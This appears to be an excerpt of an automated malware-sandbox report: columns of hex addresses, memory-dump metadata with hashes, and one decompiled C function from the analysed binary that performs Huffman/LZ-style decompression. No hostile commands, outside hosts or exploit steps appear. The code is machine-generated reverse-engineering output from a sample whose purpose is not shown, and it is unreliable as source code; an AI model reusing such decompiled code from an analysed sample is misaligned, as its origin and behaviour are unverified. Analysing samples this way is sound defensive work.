                                            0x00c3eb1d
                                            0x00c3eb33
                                            0x00c3eb3b
                                            0x00c3eb3f
                                            0x00c3eb4a
                                            0x00c3eb5c
                                            0x00c3eb63
                                            0x00c3eb66
                                            0x00c3eb6c
                                            0x00c3eb6e
                                            0x00c3eb73
                                            0x00c3eb78
                                            0x00c3eb8e
                                            0x00c3eb97
                                            0x00c3eb99
                                            0x00c3eb9c
                                            0x00c3eba2
                                            0x00c3eba8
                                            0x00c3ebb7
                                            0x00c3ebc7
                                            0x00c3ebc9
                                            0x00c3ebcf
                                            0x00c3ebd1
                                            0x00c3ebd7
                                            0x00c3ebdc
                                            0x00c3ebe0
                                            0x00c3ebe6
                                            0x00c3ebea
                                            0x00c3ebf4
                                            0x00c3ebfb
                                            0x00c3ec00
                                            0x00c3ec01
                                            0x00c3ec05
                                            0x00c3ec09
                                            0x00c3ec0d
                                            0x00c3ec0d
                                            0x00c3ec0d
                                            0x00c3ec12
                                            0x00c3ec16
                                            0x00c3ec1e
                                            0x00c3ec24
                                            0x00c3ec27
                                            0x00c3ec2a
                                            0x00c3ec39
                                            0x00c3ec48
                                            0x00c3ec4a
                                            0x00c3ec4d
                                            0x00c3ec53
                                            0x00c3ec5d
                                            0x00c3ec62
                                            0x00c3ec68
                                            0x00c3ec6c
                                            0x00c3ec70
                                            0x00c3ec74
                                            0x00c3ec78
                                            0x00c3ec7d
                                            0x00c3ec90
                                            0x00c3ec9f
                                            0x00c3eca1
                                            0x00c3eca4
                                            0x00c3ecaa
                                            0x00c3ecaf
                                            0x00c3ecc2
                                            0x00c3ecc8
                                            0x00c3eccc
                                            0x00c3ecdc
                                            0x00c3ece5
                                            0x00c3ecef
                                            0x00c3ecf2
                                            0x00c3ecf4
                                            0x00c3ecfb
                                            0x00c3ed01
                                            0x00c3ed10
                                            0x00c3ed1d
                                            0x00c3ed23
                                            0x00c3ed2b
                                            0x00c3ed4c
                                            0x00c3ed4f
                                            0x00c3ed56
                                            0x00c3ed5a
                                            0x00c3ed5d
                                            0x00c3ed67
                                            0x00c3ed77
                                            0x00c3ed7c
                                            0x00c3ed84
                                            0x00c3ed9b
                                            0x00c3eda2
                                            0x00c3eda6
                                            0x00c3eda8
                                            0x00c3edab
                                            0x00c3edb1
                                            0x00c3edba
                                            0x00c3edca
                                            0x00c3edcf
                                            0x00c3edd6
                                            0x00c3edda
                                            0x00c3edde
                                            0x00c3ede9
                                            0x00c3edea
                                            0x00c3edf4
                                            0x00c3edf4
                                            0x00c3edf4
                                            0x00c3edf7
                                            0x00c3edfa
                                            0x00c3ee01
                                            0x00c3ee06
                                            0x00c3ee0b
                                            0x00c3ee12
                                            0x00c3ee20
                                            0x00c3ee2f
                                            0x00c3ee31
                                            0x00c3ee37
                                            0x00c3ee46
                                            0x00c3ee49
                                            0x00c3ee4c
                                            0x00c3ee4d
                                            0x00c3ee59
                                            0x00c3ee5d
                                            0x00c3ee67
                                            0x00c3ee69
                                            0x00c3ee70
                                            0x00c3ee80
                                            0x00c3ee89
                                            0x00c3ee8b
                                            0x00c3ee8e
                                            0x00c3ee9a
                                            0x00c3eea2
                                            0x00c3eea9
                                            0x00c3eeac
                                            0x00c3eeb0
                                            0x00c3eeb6
                                            0x00c3eebc
                                            0x00c3eec0
                                            0x00c3eed0
                                            0x00c3eedf
                                            0x00c3eee2
                                            0x00c3eee4
                                            0x00c3eee7
                                            0x00c3ef0b
                                            0x00c3ef14
                                            0x00c3ef17
                                            0x00c3ef19
                                            0x00c3ef1d
                                            0x00c3ef27
                                            0x00c3ef2e
                                            0x00c3ef44
                                            0x00c3ef4e
                                            0x00c3ef50
                                            0x00c3ef54
                                            0x00c3ef62
                                            0x00c3ef71
                                            0x00c3ef79
                                            0x00c3ef7e
                                            0x00c3ef85
                                            0x00c3ef9e
                                            0x00c3efa4
                                            0x00c3efa6
                                            0x00c3efaa
                                            0x00c3efb0
                                            0x00c3efb8
                                            0x00c3efbd
                                            0x00c3efcd
                                            0x00c3efd3
                                            0x00c3efd7
                                            0x00c3efe1
                                            0x00000000
                                            0x00000000
                                            0x00c3edf0
                                            0x00c3edf0
                                            0x00c3efe9
                                            0x00c3efea
                                            0x00c3efee
                                            0x00c3efee
                                            0x00c3efee
                                            0x00c3eff3
                                            0x00c3eff7
                                            0x00c3effc
                                            0x00c3f001
                                            0x00c3f006
                                            0x00c3f008
                                            0x00c3f00a
                                            0x00c3f00e
                                            0x00c3f01d
                                            0x00c3f02c
                                            0x00c3f02e
                                            0x00c3f031
                                            0x00c3f039
                                            0x00c3f03e
                                            0x00c3f047
                                            0x00c3f04d
                                            0x00c3f051
                                            0x00c3f055
                                            0x00c3f05c
                                            0x00c3f05e
                                            0x00c3f071
                                            0x00c3f080
                                            0x00c3f082
                                            0x00c3f085
                                            0x00c3f08d
                                            0x00c3f0a0
                                            0x00c3f0a4
                                            0x00c3f0a8
                                            0x00c3f0ab
                                            0x00c3f0bb
                                            0x00c3f0c4
                                            0x00c3f0ce
                                            0x00c3f0d1
                                            0x00c3f0d3
                                            0x00c3f0da
                                            0x00c3f0de
                                            0x00c3f0f3
                                            0x00c3f0fc
                                            0x00c3f100
                                            0x00c3f104
                                            0x00c3f129
                                            0x00c3f132
                                            0x00c3f135
                                            0x00c3f137
                                            0x00c3f13a
                                            0x00c3f148
                                            0x00c3f155
                                            0x00c3f172
                                            0x00c3f175
                                            0x00c3f179
                                            0x00c3f17b
                                            0x00c3f17e
                                            0x00c3f184
                                            0x00c3f18c
                                            0x00c3f195
                                            0x00c3f199
                                            0x00c3f1a2
                                            0x00c3f1a6
                                            0x00c3f1a8
                                            0x00c3f1af
                                            0x00c3f1b3
                                            0x00c3f1bc
                                            0x00c3f1c0
                                            0x00c3f1c3
                                            0x00c3f1c6
                                            0x00c3f1c9
                                            0x00c3f1cb
                                            0x00c3f1d5

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 21433a5f7de97874b167784364e9de3bea179284053d1adb041105bdc07d2dba
                                            • Instruction ID: 27878871e28803cc22862bd250f0ea30dd7e9404a4c0d4e554ac5eaca0c35739
                                            • Opcode Fuzzy Hash: 21433a5f7de97874b167784364e9de3bea179284053d1adb041105bdc07d2dba
                                            • Instruction Fuzzy Hash: 065248B26087019FC758CF19C891A6AF7E1FFC8304F49892DF9968B255D734E919CB82
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C466A2, Relevance: .5, Instructions: 509COMMONCrypto
                                            Download Yara Rule
                                            C-Code - Quality: 88%
                                            			E00C466A2(signed int __ecx) {
				void* __ebp;
				signed int _t201;
				signed int _t203;
				signed int _t205;
				signed int _t206;
				signed int _t207;
				signed int _t209;
				signed int _t210;
				signed int _t212;
				signed int _t214;
				signed int _t215;
				signed int _t216;
				signed int _t218;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				unsigned int _t223;
				signed int _t233;
				signed int _t237;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t244;
				signed int _t245;
				signed short _t246;
				signed int _t247;
				signed int _t250;
				signed int* _t251;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				unsigned int _t256;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t263;
				signed int _t264;
				signed short _t265;
				unsigned int _t269;
				unsigned int _t274;
				signed int _t279;
				signed short _t280;
				signed int _t284;
				void* _t291;
				signed int _t293;
				signed int* _t295;
				signed int _t296;
				signed int _t297;
				signed int _t301;
				signed int _t304;
				signed int _t305;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t313;
				intOrPtr _t314;
				signed int _t315;
				unsigned int _t318;
				void* _t320;
				signed int _t323;
				signed int _t324;
				unsigned int _t327;
				void* _t329;
				signed int _t332;
				void* _t335;
				signed int _t338;
				signed int _t339;
				intOrPtr* _t341;
				void* _t342;
				signed int _t345;
				signed int* _t349;
				signed int _t350;
				unsigned int _t354;
				void* _t356;
				signed int _t359;
				void* _t363;
				signed int _t366;
				signed int _t367;
				unsigned int _t370;
				void* _t372;
				signed int _t375;
				intOrPtr* _t377;
				void* _t378;
				signed int _t381;
				void* _t384;
				signed int _t388;
				signed int _t389;
				intOrPtr* _t391;
				void* _t392;
				signed int _t395;
				void* _t398;
				signed int _t401;
				signed int _t402;
				intOrPtr* _t404;
				void* _t405;
				signed int _t408;
				signed int _t414;
				unsigned int _t416;
				unsigned int _t420;
				signed int _t423;
				signed int _t424;
				unsigned int _t426;
				unsigned int _t430;
				signed int _t433;
				signed int _t434;
				void* _t435;
				signed int _t436;
				intOrPtr* _t438;
				signed char _t440;
				signed int _t442;
				intOrPtr _t443;
				signed int _t446;
				signed int _t447;
				signed int _t448;
				void* _t455;

				_t440 =  *(_t455 + 0x34);
				 *(_t455 + 0x14) = __ecx;
				if( *((char*)(_t440 + 0x2c)) != 0) {
					L3:
					_t313 =  *((intOrPtr*)(_t440 + 0x18));
					_t438 = _t440 + 4;
					__eflags =  *_t438 -  *((intOrPtr*)(_t440 + 0x24)) + _t313;
					if( *_t438 <=  *((intOrPtr*)(_t440 + 0x24)) + _t313) {
						 *(_t440 + 0x4ad8) =  *(_t440 + 0x4ad8) & 0x00000000;
						_t201 =  *((intOrPtr*)(_t440 + 0x20)) - 1 + _t313;
						_t414 =  *((intOrPtr*)(_t440 + 0x4acc)) - 0x10;
						 *(_t455 + 0x14) = _t201;
						 *(_t455 + 0x10) = _t414;
						_t293 = _t201;
						__eflags = _t201 - _t414;
						if(_t201 >= _t414) {
							_t293 = _t414;
						}
						 *(_t455 + 0x3c) = _t293;
						while(1) {
							_t314 =  *_t438;
							__eflags = _t314 - _t293;
							if(_t314 < _t293) {
								goto L15;
							}
							L9:
							__eflags = _t314 - _t201;
							if(__eflags > 0) {
								L93:
								L94:
								return _t201;
							}
							if(__eflags != 0) {
								L12:
								__eflags = _t314 - _t414;
								if(_t314 < _t414) {
									L14:
									__eflags = _t314 -  *((intOrPtr*)(_t440 + 0x4acc));
									if(_t314 >=  *((intOrPtr*)(_t440 + 0x4acc))) {
										L92:
										 *((char*)(_t440 + 0x4ad3)) = 1;
										goto L93;
									}
									goto L15;
								}
								__eflags =  *((char*)(_t440 + 0x4ad2));
								if( *((char*)(_t440 + 0x4ad2)) == 0) {
									goto L92;
								}
								goto L14;
							}
							_t201 =  *(_t440 + 8);
							__eflags = _t201 -  *((intOrPtr*)(_t440 + 0x1c));
							if(_t201 >=  *((intOrPtr*)(_t440 + 0x1c))) {
								goto L93;
							}
							goto L12;
							L15:
							_t315 =  *(_t440 + 0x4adc);
							__eflags =  *(_t440 + 0x4ad8) - _t315 - 8;
							if( *(_t440 + 0x4ad8) > _t315 - 8) {
								_t284 = _t315 + _t315;
								 *(_t440 + 0x4adc) = _t284;
								_push(_t284 * 0xc);
								_push( *(_t440 + 0x4ad4));
								_t310 = E00C52B5E(_t315, _t414);
								__eflags = _t310;
								if(_t310 == 0) {
									E00C36D3A(0xc700e0);
								}
								 *(_t440 + 0x4ad4) = _t310;
							}
							_t203 =  *(_t440 + 0x4ad8);
							_t295 = _t203 * 0xc +  *(_t440 + 0x4ad4);
							 *(_t455 + 0x24) = _t295;
							 *(_t440 + 0x4ad8) = _t203 + 1;
							_t205 = E00C3A4ED(_t438);
							_t206 =  *(_t440 + 0xb4);
							_t416 = _t205 & 0x0000fffe;
							__eflags = _t416 -  *((intOrPtr*)(_t440 + 0x34 + _t206 * 4));
							if(_t416 >=  *((intOrPtr*)(_t440 + 0x34 + _t206 * 4))) {
								_t442 = 0xf;
								_t207 = _t206 + 1;
								__eflags = _t207 - _t442;
								if(_t207 >= _t442) {
									L27:
									_t318 =  *(_t438 + 4) + _t442;
									 *(_t438 + 4) = _t318 & 0x00000007;
									_t209 = _t318 >> 3;
									 *_t438 =  *_t438 + _t209;
									_t320 = 0x10;
									_t443 =  *((intOrPtr*)(_t455 + 0x1c));
									_t323 =  *((intOrPtr*)(_t440 + 0x74 + _t442 * 4)) + (_t416 -  *((intOrPtr*)(_t440 + 0x30 + _t442 * 4)) >> _t320 - _t442);
									__eflags = _t323 -  *((intOrPtr*)(_t440 + 0x30));
									asm("sbb eax, eax");
									_t210 = _t209 & _t323;
									__eflags = _t210;
									_t324 =  *(_t440 + 0xcb8 + _t210 * 2) & 0x0000ffff;
									goto L28;
								}
								_t404 = _t440 + 0x34 + _t207 * 4;
								while(1) {
									__eflags = _t416 -  *_t404;
									if(_t416 <  *_t404) {
										break;
									}
									_t207 = _t207 + 1;
									_t404 = _t404 + 4;
									__eflags = _t207 - 0xf;
									if(_t207 < 0xf) {
										continue;
									}
									goto L27;
								}
								_t442 = _t207;
								goto L27;
							} else {
								_t405 = 0x10;
								_t436 = _t416 >> _t405 - _t206;
								_t408 = ( *(_t436 + _t440 + 0xb8) & 0x000000ff) +  *(_t438 + 4);
								 *_t438 =  *_t438 + (_t408 >> 3);
								 *(_t438 + 4) = _t408 & 0x00000007;
								_t324 =  *(_t440 + 0x4b8 + _t436 * 2) & 0x0000ffff;
								L28:
								__eflags = _t324 - 0x100;
								if(_t324 >= 0x100) {
									__eflags = _t324 - 0x106;
									if(_t324 < 0x106) {
										__eflags = _t324 - 0x100;
										if(_t324 != 0x100) {
											__eflags = _t324 - 0x101;
											if(_t324 != 0x101) {
												_t212 = 3;
												 *_t295 = _t212;
												_t295[2] = _t324 - 0x102;
												_t214 = E00C3A4ED(_t438);
												_t215 =  *(_t440 + 0x2d78);
												_t420 = _t214 & 0x0000fffe;
												__eflags = _t420 -  *((intOrPtr*)(_t440 + 0x2cf8 + _t215 * 4));
												if(_t420 >=  *((intOrPtr*)(_t440 + 0x2cf8 + _t215 * 4))) {
													_t296 = 0xf;
													_t216 = _t215 + 1;
													__eflags = _t216 - _t296;
													if(_t216 >= _t296) {
														L85:
														_t327 =  *(_t438 + 4) + _t296;
														 *(_t438 + 4) = _t327 & 0x00000007;
														_t218 = _t327 >> 3;
														 *_t438 =  *_t438 + _t218;
														_t329 = 0x10;
														_t332 =  *((intOrPtr*)(_t440 + 0x2d38 + _t296 * 4)) + (_t420 -  *((intOrPtr*)(_t440 + 0x2cf4 + _t296 * 4)) >> _t329 - _t296);
														__eflags = _t332 -  *((intOrPtr*)(_t440 + 0x2cf4));
														asm("sbb eax, eax");
														_t219 = _t218 & _t332;
														__eflags = _t219;
														_t220 =  *(_t440 + 0x397c + _t219 * 2) & 0x0000ffff;
														L86:
														_t297 = _t220 & 0x0000ffff;
														__eflags = _t297 - 8;
														if(_t297 >= 8) {
															_t221 = 3;
															_t446 = (_t297 >> 2) - 1;
															_t301 = ((_t297 & _t221 | 0x00000004) << _t446) + 2;
															__eflags = _t446;
															if(_t446 != 0) {
																_t223 = E00C3A4ED(_t438);
																_t335 = 0x10;
																_t301 = _t301 + (_t223 >> _t335 - _t446);
																_t338 =  *(_t438 + 4) + _t446;
																 *_t438 =  *_t438 + (_t338 >> 3);
																_t339 = _t338 & 0x00000007;
																__eflags = _t339;
																 *(_t438 + 4) = _t339;
															}
														} else {
															_t301 = _t297 + 2;
														}
														( *(_t455 + 0x24))[1] = _t301;
														L91:
														_t414 =  *(_t455 + 0x14);
														_t201 =  *(_t455 + 0x18);
														_t293 =  *(_t455 + 0x3c);
														_t443 =  *((intOrPtr*)(_t455 + 0x1c));
														while(1) {
															_t314 =  *_t438;
															__eflags = _t314 - _t293;
															if(_t314 < _t293) {
																goto L15;
															}
															goto L9;
														}
													}
													_t341 = _t440 + 0x2cf8 + _t216 * 4;
													while(1) {
														__eflags = _t420 -  *_t341;
														if(_t420 <  *_t341) {
															break;
														}
														_t216 = _t216 + 1;
														_t341 = _t341 + 4;
														__eflags = _t216 - 0xf;
														if(_t216 < 0xf) {
															continue;
														}
														goto L85;
													}
													_t296 = _t216;
													goto L85;
												}
												_t342 = 0x10;
												_t423 = _t420 >> _t342 - _t215;
												_t345 = ( *(_t423 + _t440 + 0x2d7c) & 0x000000ff) +  *(_t438 + 4);
												 *_t438 =  *_t438 + (_t345 >> 3);
												 *(_t438 + 4) = _t345 & 0x00000007;
												_t220 =  *(_t440 + 0x317c + _t423 * 2) & 0x0000ffff;
												goto L86;
											}
											 *_t295 = 2;
											L33:
											_t414 =  *(_t455 + 0x14);
											_t201 =  *(_t455 + 0x18);
											_t293 =  *(_t455 + 0x3c);
											continue;
										}
										_push(_t455 + 0x28);
										E00C43564(_t443, _t438);
										_t295[1] =  *(_t455 + 0x28) & 0x000000ff;
										_t295[2] =  *(_t455 + 0x2c);
										_t424 = 4;
										 *_t295 = _t424;
										_t233 =  *(_t440 + 0x4ad8);
										_t349 = _t233 * 0xc +  *(_t440 + 0x4ad4);
										 *(_t440 + 0x4ad8) = _t233 + 1;
										_t349[1] =  *(_t455 + 0x34) & 0x000000ff;
										 *_t349 = _t424;
										_t349[2] =  *(_t455 + 0x30);
										goto L33;
									}
									_t237 = _t324 - 0x106;
									__eflags = _t237 - 8;
									if(_t237 >= 8) {
										_t350 = 3;
										_t304 = (_t237 >> 2) - 1;
										_t237 = (_t237 & _t350 | 0x00000004) << _t304;
										__eflags = _t237;
									} else {
										_t304 = 0;
									}
									_t447 = _t237 + 2;
									 *(_t455 + 0x10) = _t447;
									__eflags = _t304;
									if(_t304 != 0) {
										_t274 = E00C3A4ED(_t438);
										_t398 = 0x10;
										_t401 =  *(_t438 + 4) + _t304;
										 *(_t455 + 0x10) = _t447 + (_t274 >> _t398 - _t304);
										 *_t438 =  *_t438 + (_t401 >> 3);
										_t402 = _t401 & 0x00000007;
										__eflags = _t402;
										 *(_t438 + 4) = _t402;
									}
									_t240 = E00C3A4ED(_t438);
									_t241 =  *(_t440 + 0xfa0);
									_t426 = _t240 & 0x0000fffe;
									__eflags = _t426 -  *((intOrPtr*)(_t440 + 0xf20 + _t241 * 4));
									if(_t426 >=  *((intOrPtr*)(_t440 + 0xf20 + _t241 * 4))) {
										_t305 = 0xf;
										_t242 = _t241 + 1;
										__eflags = _t242 - _t305;
										if(_t242 >= _t305) {
											L49:
											_t354 =  *(_t438 + 4) + _t305;
											 *(_t438 + 4) = _t354 & 0x00000007;
											_t244 = _t354 >> 3;
											 *_t438 =  *_t438 + _t244;
											_t356 = 0x10;
											_t359 =  *((intOrPtr*)(_t440 + 0xf60 + _t305 * 4)) + (_t426 -  *((intOrPtr*)(_t440 + 0xf1c + _t305 * 4)) >> _t356 - _t305);
											__eflags = _t359 -  *((intOrPtr*)(_t440 + 0xf1c));
											asm("sbb eax, eax");
											_t245 = _t244 & _t359;
											__eflags = _t245;
											_t246 =  *(_t440 + 0x1ba4 + _t245 * 2) & 0x0000ffff;
											goto L50;
										}
										_t391 = _t440 + 0xf20 + _t242 * 4;
										while(1) {
											__eflags = _t426 -  *_t391;
											if(_t426 <  *_t391) {
												break;
											}
											_t242 = _t242 + 1;
											_t391 = _t391 + 4;
											__eflags = _t242 - 0xf;
											if(_t242 < 0xf) {
												continue;
											}
											goto L49;
										}
										_t305 = _t242;
										goto L49;
									} else {
										_t392 = 0x10;
										_t434 = _t426 >> _t392 - _t241;
										_t395 = ( *(_t434 + _t440 + 0xfa4) & 0x000000ff) +  *(_t438 + 4);
										 *_t438 =  *_t438 + (_t395 >> 3);
										 *(_t438 + 4) = _t395 & 0x00000007;
										_t246 =  *(_t440 + 0x13a4 + _t434 * 2) & 0x0000ffff;
										L50:
										_t247 = _t246 & 0x0000ffff;
										__eflags = _t247 - 4;
										if(_t247 >= 4) {
											_t308 = (_t247 >> 1) - 1;
											_t247 = (_t247 & 0x00000001 | 0x00000002) << _t308;
											__eflags = _t247;
										} else {
											_t308 = 0;
										}
										_t250 = _t247 + 1;
										 *(_t455 + 0x20) = _t250;
										_t448 = _t250;
										__eflags = _t308;
										if(_t308 == 0) {
											L68:
											__eflags = _t448 - 0x100;
											if(_t448 > 0x100) {
												_t253 =  *(_t455 + 0x10) + 1;
												 *(_t455 + 0x10) = _t253;
												__eflags = _t448 - 0x2000;
												if(_t448 > 0x2000) {
													_t254 = _t253 + 1;
													 *(_t455 + 0x10) = _t254;
													__eflags = _t448 - 0x40000;
													if(_t448 > 0x40000) {
														_t255 = _t254 + 1;
														__eflags = _t255;
														 *(_t455 + 0x10) = _t255;
													}
												}
											}
											_t251 =  *(_t455 + 0x24);
											 *_t251 = 1;
											_t251[1] =  *(_t455 + 0x10);
											_t251[2] = _t448;
											goto L91;
										} else {
											__eflags = _t308 - 4;
											if(__eflags < 0) {
												_t256 = E00C47D76(_t438);
												_t363 = 0x20;
												_t448 = (_t256 >> _t363 - _t308) +  *(_t455 + 0x20);
												_t366 =  *(_t438 + 4) + _t308;
												 *_t438 =  *_t438 + (_t366 >> 3);
												_t367 = _t366 & 0x00000007;
												__eflags = _t367;
												 *(_t438 + 4) = _t367;
												goto L68;
											}
											if(__eflags > 0) {
												_t269 = E00C47D76(_t438);
												_t384 = 0x24;
												_t448 = (_t269 >> _t384 - _t308 << 4) +  *(_t455 + 0x20);
												_t388 =  *(_t438 + 4) + 0xfffffffc + _t308;
												 *_t438 =  *_t438 + (_t388 >> 3);
												_t389 = _t388 & 0x00000007;
												__eflags = _t389;
												 *(_t438 + 4) = _t389;
											}
											_t259 = E00C3A4ED(_t438);
											_t260 =  *(_t440 + 0x1e8c);
											_t430 = _t259 & 0x0000fffe;
											__eflags = _t430 -  *((intOrPtr*)(_t440 + 0x1e0c + _t260 * 4));
											if(_t430 >=  *((intOrPtr*)(_t440 + 0x1e0c + _t260 * 4))) {
												_t309 = 0xf;
												_t261 = _t260 + 1;
												__eflags = _t261 - _t309;
												if(_t261 >= _t309) {
													L65:
													_t370 =  *(_t438 + 4) + _t309;
													 *(_t438 + 4) = _t370 & 0x00000007;
													_t263 = _t370 >> 3;
													 *_t438 =  *_t438 + _t263;
													_t372 = 0x10;
													_t375 =  *((intOrPtr*)(_t440 + 0x1e4c + _t309 * 4)) + (_t430 -  *((intOrPtr*)(_t440 + 0x1e08 + _t309 * 4)) >> _t372 - _t309);
													__eflags = _t375 -  *((intOrPtr*)(_t440 + 0x1e08));
													asm("sbb eax, eax");
													_t264 = _t263 & _t375;
													__eflags = _t264;
													_t265 =  *(_t440 + 0x2a90 + _t264 * 2) & 0x0000ffff;
													goto L66;
												}
												_t377 = _t440 + 0x1e0c + _t261 * 4;
												while(1) {
													__eflags = _t430 -  *_t377;
													if(_t430 <  *_t377) {
														break;
													}
													_t261 = _t261 + 1;
													_t377 = _t377 + 4;
													__eflags = _t261 - 0xf;
													if(_t261 < 0xf) {
														continue;
													}
													goto L65;
												}
												_t309 = _t261;
												goto L65;
											} else {
												_t378 = 0x10;
												_t433 = _t430 >> _t378 - _t260;
												_t381 = ( *(_t433 + _t440 + 0x1e90) & 0x000000ff) +  *(_t438 + 4);
												 *_t438 =  *_t438 + (_t381 >> 3);
												 *(_t438 + 4) = _t381 & 0x00000007;
												_t265 =  *(_t440 + 0x2290 + _t433 * 2) & 0x0000ffff;
												L66:
												_t448 = _t448 + (_t265 & 0x0000ffff);
												goto L68;
											}
										}
									}
								}
								__eflags =  *(_t440 + 0x4ad8) - 1;
								if( *(_t440 + 0x4ad8) <= 1) {
									L34:
									 *_t295 =  *_t295 & 0x00000000;
									_t295[2] = _t324;
									_t295[1] = 0;
									goto L33;
								}
								__eflags =  *(_t295 - 0xc);
								if( *(_t295 - 0xc) != 0) {
									goto L34;
								}
								_t279 =  *(_t295 - 8) & 0x0000ffff;
								_t435 = 3;
								__eflags = _t279 - _t435;
								if(_t279 >= _t435) {
									goto L34;
								}
								_t280 = _t279 + 1;
								 *(_t295 - 8) = _t280;
								 *((_t280 & 0x0000ffff) + _t295 - 4) = _t324;
								_t68 = _t440 + 0x4ad8;
								 *_t68 =  *(_t440 + 0x4ad8) - 1;
								__eflags =  *_t68;
								goto L33;
							}
						}
					}
					 *((char*)(_t440 + 0x4ad0)) = 1;
					goto L94;
				} else {
					 *((char*)(_t440 + 0x2c)) = 1;
					_push(_t440 + 0x30);
					_push(_t440 + 0x18);
					_push(_t440 + 4);
					_t291 = E00C4397F(__ecx);
					if(_t291 != 0) {
						goto L3;
					} else {
						 *((char*)(_t440 + 0x4ad0)) = 1;
						return _t291;
					}
				}
			}






















































































































                                            0x00c466a7
                                            0x00c466ad
                                            0x00c466b5
                                            0x00c466dc
                                            0x00c466df
                                            0x00c466e5
                                            0x00c466e8
                                            0x00c466ea
                                            0x00c46702
                                            0x00c46709
                                            0x00c4670b
                                            0x00c4670e
                                            0x00c46712
                                            0x00c46717
                                            0x00c46719
                                            0x00c4671b
                                            0x00c4671d
                                            0x00c4671d
                                            0x00c4671f
                                            0x00c46723
                                            0x00c46723
                                            0x00c46725
                                            0x00c46727
                                            0x00000000
                                            0x00000000
                                            0x00c46729
                                            0x00c46729
                                            0x00c4672b
                                            0x00c46ca2
                                            0x00c46ca3
                                            0x00000000
                                            0x00c46ca3
                                            0x00c46731
                                            0x00c4673f
                                            0x00c4673f
                                            0x00c46741
                                            0x00c46750
                                            0x00c46750
                                            0x00c46756
                                            0x00c46c9b
                                            0x00c46c9b
                                            0x00000000
                                            0x00c46c9b
                                            0x00000000
                                            0x00c46756
                                            0x00c46743
                                            0x00c4674a
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c4674a
                                            0x00c46733
                                            0x00c46736
                                            0x00c46739
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c4675c
                                            0x00c4675c
                                            0x00c46765
                                            0x00c4676b
                                            0x00c4676d
                                            0x00c46770
                                            0x00c46779
                                            0x00c4677a
                                            0x00c46785
                                            0x00c46789
                                            0x00c4678b
                                            0x00c46792
                                            0x00c46792
                                            0x00c46797
                                            0x00c46797
                                            0x00c4679d
                                            0x00c467a8
                                            0x00c467af
                                            0x00c467b3
                                            0x00c467b9
                                            0x00c467c0
                                            0x00c467c6
                                            0x00c467cc
                                            0x00c467d0
                                            0x00c467fd
                                            0x00c467fe
                                            0x00c467ff
                                            0x00c46801
                                            0x00c4681a
                                            0x00c4681d
                                            0x00c46824
                                            0x00c46827
                                            0x00c4682a
                                            0x00c46832
                                            0x00c4683b
                                            0x00c4683f
                                            0x00c46841
                                            0x00c46844
                                            0x00c46846
                                            0x00c46846
                                            0x00c46848
                                            0x00000000
                                            0x00c46848
                                            0x00c46806
                                            0x00c46809
                                            0x00c46809
                                            0x00c4680b
                                            0x00000000
                                            0x00000000
                                            0x00c4680d
                                            0x00c4680e
                                            0x00c46811
                                            0x00c46814
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c46816
                                            0x00c46818
                                            0x00000000
                                            0x00c467d2
                                            0x00c467d4
                                            0x00c467d7
                                            0x00c467e1
                                            0x00c467e9
                                            0x00c467ee
                                            0x00c467f1
                                            0x00c46850
                                            0x00c46855
                                            0x00c46857
                                            0x00c468a5
                                            0x00c468ab
                                            0x00c46b1e
                                            0x00c46b20
                                            0x00c46b71
                                            0x00c46b77
                                            0x00c46b86
                                            0x00c46b87
                                            0x00c46b91
                                            0x00c46b94
                                            0x00c46b9b
                                            0x00c46ba1
                                            0x00c46ba7
                                            0x00c46bae
                                            0x00c46bdb
                                            0x00c46bdc
                                            0x00c46bdd
                                            0x00c46bdf
                                            0x00c46bfb
                                            0x00c46bfe
                                            0x00c46c05
                                            0x00c46c08
                                            0x00c46c0b
                                            0x00c46c16
                                            0x00c46c22
                                            0x00c46c24
                                            0x00c46c2a
                                            0x00c46c2c
                                            0x00c46c2c
                                            0x00c46c2e
                                            0x00c46c36
                                            0x00c46c36
                                            0x00c46c39
                                            0x00c46c3c
                                            0x00c46c4a
                                            0x00c46c4d
                                            0x00c46c55
                                            0x00c46c58
                                            0x00c46c5a
                                            0x00c46c5e
                                            0x00c46c65
                                            0x00c46c6d
                                            0x00c46c6f
                                            0x00c46c76
                                            0x00c46c78
                                            0x00c46c78
                                            0x00c46c7b
                                            0x00c46c7b
                                            0x00c46c3e
                                            0x00c46c3e
                                            0x00c46c3e
                                            0x00c46c82
                                            0x00c46c86
                                            0x00c46c86
                                            0x00c46c8a
                                            0x00c46c8e
                                            0x00c46c92
                                            0x00c46723
                                            0x00c46723
                                            0x00c46725
                                            0x00c46727
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c46727
                                            0x00c46723
                                            0x00c46be7
                                            0x00c46bea
                                            0x00c46bea
                                            0x00c46bec
                                            0x00000000
                                            0x00000000
                                            0x00c46bee
                                            0x00c46bef
                                            0x00c46bf2
                                            0x00c46bf5
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c46bf7
                                            0x00c46bf9
                                            0x00000000
                                            0x00c46bf9
                                            0x00c46bb2
                                            0x00c46bb5
                                            0x00c46bbf
                                            0x00c46bc7
                                            0x00c46bcc
                                            0x00c46bcf
                                            0x00000000
                                            0x00c46bcf
                                            0x00c46b79
                                            0x00c46886
                                            0x00c46886
                                            0x00c4688a
                                            0x00c4688e
                                            0x00000000
                                            0x00c4688e
                                            0x00c46b28
                                            0x00c46b2a
                                            0x00c46b34
                                            0x00c46b3c
                                            0x00c46b41
